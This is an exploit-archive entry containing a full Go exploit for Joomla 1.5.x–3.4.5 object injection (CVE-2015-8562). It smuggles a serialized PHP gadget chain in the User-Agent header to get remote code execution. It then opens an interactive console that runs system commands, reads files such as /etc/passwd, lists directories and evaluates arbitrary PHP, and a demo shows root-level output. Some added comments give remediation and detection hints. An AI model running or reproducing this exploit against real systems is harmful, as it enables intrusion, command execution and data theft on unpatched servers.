Joomla 3.4.5 Object Injection



EKU-ID: 5327 CVE: 2015-8562 OSVDB-ID:
Author: Khashayar Fereidani Published: 2016-01-04 Verified: Verified


package main

/*
**************************************************************************
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )
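* Version: 1.5.x to 3.4.5
* CVE : CVE-2015-8562
* Remediation: run a Joomla release newer than 3.4.5 on a patched PHP build.
*   In access logs, a User-Agent that carries serialized PHP objects marks an attempt.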
**************************************************************************
* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PURPOSES ANY ILLEGAL USAGE
*                     IS ON YOUR OWN RESPONSIBILITY
**************************************************************************
* How to run : (you need golang compiler from golang.org)
* go run exploit.go http://target/path
* or
* go build exploit.go
* ./exploit http://target/path
**************************************************************************
* DEMO :

$ ./exploit 192.168.1.113/joomla
###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.x to 3.4.5
###############################################

Attacking to  http://FILTERED.TLD/joomla/
Target is vulnerable !
# Command Line Documentation :
read FILEPATH			read file from FILEPATH
dir DIRPATH			list directory in DIRPATH
exec COMMAND			execute system command
eval phpcode			evaluate PHP Code
help				display this help
exit				close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')


root@joomla:$ exec uname -a
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@joomla:$

 */

import (
	"fmt"
	"net/http"
	"regexp"
	"os"
	"io/ioutil"
	"bytes"
	"net/http/cookiejar"
	"net/url"
	"bufio"
	"strings"
)


// Package-level state shared by the request builder, the response parser and
// the interactive console in main.
var (
	// target is the base URL every request is sent to; main assigns it once
	// from the first command-line argument.
	target string

	// client is the cookie-aware HTTP client created in main. The cookie jar
	// matters because the second request must reuse the session cookie issued
	// in response to the first one.
	client *http.Client

	// validHttpUrl reports whether a string already starts with http:// or
	// https://.
	validHttpUrl = regexp.MustCompile("^http[s]{0,1}://")

	// resultRegex captures everything that follows the literal marker
	// "iMH3r3=" in a response body. The marker is a useful string to search
	// for in captured HTTP responses when triaging a suspected compromise.
	resultRegex = regexp.MustCompile("(?sm)iMH3r3=(.*)")

	// cmdRegex splits a console line into a verb and its argument.
	cmdRegex = regexp.MustCompile("(\\w+)\\s(.+)")

	// newLine matches a single CR or LF so console input can be stripped.
	newLine = regexp.MustCompile("[\\n\\r]")
)

// helpString is the usage text printed by the console.
var helpString = `# Command Line Documentation :
read FILEPATH			read file from FILEPATH
dir DIRPATH			list directory in DIRPATH
exec COMMAND			execute system command
eval phpcode			evaluate PHP Code
help				display this help
exit				close exploit console

[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')

`

// newRequest builds the single HTTP request shape this program ever sends:
// a form-encoded POST to target whose field "1" holds PHP source and whose
// User-Agent header holds a serialized PHP object chain (CVE-2015-8562).
//
// It panics if http.NewRequest rejects the target URL.
//
// Detection notes for defenders, all visible in the header value below:
//   - the User-Agent contains PHP serialization syntax ("}__", `O:21:"JDatabaseDriverMysqli"`,
//     "disconnectHandlers", "SimplePie"), which no browser sends;
//   - the header ends with the four bytes F0 FD FD FD, which are not valid UTF-8;
//   - the request is a POST carrying a form field literally named "1".
func newRequest(command string) *http.Request{
	values:=url.Values{}
	// The marker is echoed before the caller's code so the client can find the
	// start of its output in the response (see resultRegex).
	values.Set("1","echo('iMH3r3=');"+command+";")

	req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))

	if err!=nil{
		panic(err)
	}

	// The serialized chain ends in a feed_url string that evaluates $_POST[1],
	// which is why the form field above is named "1".
	// NOTE(review): the trailing \xf0\xfd\xfd\xfd bytes presumably make the
	// server-side session store cut the stored value short; that mechanism is
	// not shown in this file, so confirm it against the CVE-2015-8562 advisory.
	req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	return req
}


// escape returns str with every single quote preceded by a backslash.
// No other character is altered.
func escape(str string) string {
	const quote, escapedQuote = "'", "\\'"
	return strings.ReplaceAll(str, quote, escapedQuote)
}


// runCommand sends command through newRequest using the shared client and
// prints whatever follows the "iMH3r3=" marker in the response body.
//
// Transport errors are printed and end the call. A body read error is printed
// too, but the bytes read so far are still searched for the marker. Nothing
// is printed when the marker is absent.
//
// For responders: a response body containing "iMH3r3=" followed by other
// output is the server-side trace of a request built by this tool.
func runCommand(command string) {
	resp, err := client.Do(newRequest(command))
	if err != nil {
		fmt.Println(err.Error())
		return
	}
	defer resp.Body.Close()

	raw, readErr := ioutil.ReadAll(resp.Body)
	if readErr != nil {
		fmt.Println(readErr)
	}

	found := resultRegex.FindStringSubmatch(string(raw))
	if len(found) == 0 {
		return
	}
	// found[0] begins with the 7-byte marker "iMH3r3="; print what follows it.
	fmt.Print(found[0][7:])
}


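// confirm sends a request with an empty command and reports whether the
// "iMH3r3=" marker comes back in the response body.
//
// It returns false when the request fails, when the server answers HTTP 500
// (which this tool reports as a patched PHP version), or when the marker is
// absent. A body read error is printed, and the bytes read so far are still
// searched for the marker.
//
// The response body is closed on every path, including the HTTP 500 return,
// so the connection is not leaked.
func confirm() bool {
	res, err := client.Do(newRequest(""))
	if err != nil {
		fmt.Println(err)
		return false
	}
	defer res.Body.Close()

	if res.StatusCode == 500 {
		fmt.Println("Patched PHP Version :( !")
		return false
	}

	resBytes, err := ioutil.ReadAll(res.Body)
	if err != nil {
		fmt.Println(err)
	}

	return len(resultRegex.FindStringSubmatch(string(resBytes))) > 0
}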

// main prints the banner, normalises the target URL taken from the first
// command-line argument, sends one priming request, calls confirm, and on
// success runs a line-oriented console that forwards each command through
// runCommand.
//
// Traffic pattern seen by the server: at least two POSTs from the same client
// with the same session cookie (the client uses a cookie jar), followed by one
// more POST per console command.
func main() {
	fmt.Print(`###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.0 to 3.4.5
###############################################
`)

	jar, err := cookiejar.New(&cookiejar.Options{})
	if err != nil {
		panic(err)
	}
	client = &http.Client{Jar: jar}

	if len(os.Args) < 2 {
		fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/")
		return
	}

	// Normalise the target: default to http:// and force a trailing slash.
	target = os.Args[1]
	if !validHttpUrl.MatchString(target) {
		target = "http://" + target
	}
	if !strings.HasSuffix(target, "/") {
		target += "/"
	}

	fmt.Println("Attacking to ", target)

	// Priming request: the body is read and discarded; only its side effects
	// on the server and on the cookie jar are used.
	first, err := client.Do(newRequest(""))
	if err != nil {
		fmt.Println("Request Error:", err)
		return
	}
	ioutil.ReadAll(first.Body)
	first.Body.Close()

	if !confirm() {
		fmt.Println("Target is not vulnerable!")
		return
	}

	fmt.Println("Target is vulnerable !")
	console := bufio.NewReader(os.Stdin)
	fmt.Println(helpString)

	for {
		fmt.Print("root@joomla:$ ")
		// NOTE(review): the read error is discarded, so once stdin is closed
		// every iteration sees an empty line.
		raw, _ := console.ReadString('\n')
		line := newLine.ReplaceAllString(raw, "")

		parts := cmdRegex.FindStringSubmatch(line)
		if len(parts) < 3 {
			// Not "verb argument": only exit and help are meaningful here.
			switch line {
			case "exit":
				return
			case "help":
			default:
				fmt.Println("Wrong input !")
			}
			fmt.Println(helpString)
			continue
		}

		verb, arg := parts[1], parts[2]
		quoted := escape(arg)
		switch verb {
		case "exec":
			runCommand("system('" + quoted + "')")
		case "read":
			runCommand("readfile('" + quoted + "')")
		case "dir":
			runCommand("$a=scandir('" + quoted + "');foreach($a as $v){echo $v.\"\\n\";}")
		case "eval":
			// eval forwards the argument as typed, without quote escaping.
			runCommand(arg)
		}
	}
}